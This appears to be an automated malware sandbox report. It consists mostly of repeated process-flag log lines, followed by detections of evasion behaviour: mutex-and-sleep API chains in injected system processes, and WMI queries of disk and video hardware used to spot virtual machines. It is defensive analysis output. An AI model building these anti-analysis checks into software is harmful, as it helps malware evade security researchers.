Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_0-1464
Source: C:\Windows\System32\msiexec.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_9-1486
Source: C:\Windows\System32\msiexec.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_9-1161
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_1-1146
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_1-1442
Source: C:\Windows\System32\audiodg.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_8-1147
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_0-1148
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_6-1480
Source: C:\Windows\System32\audiodg.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_8-1478
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_6-1203

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
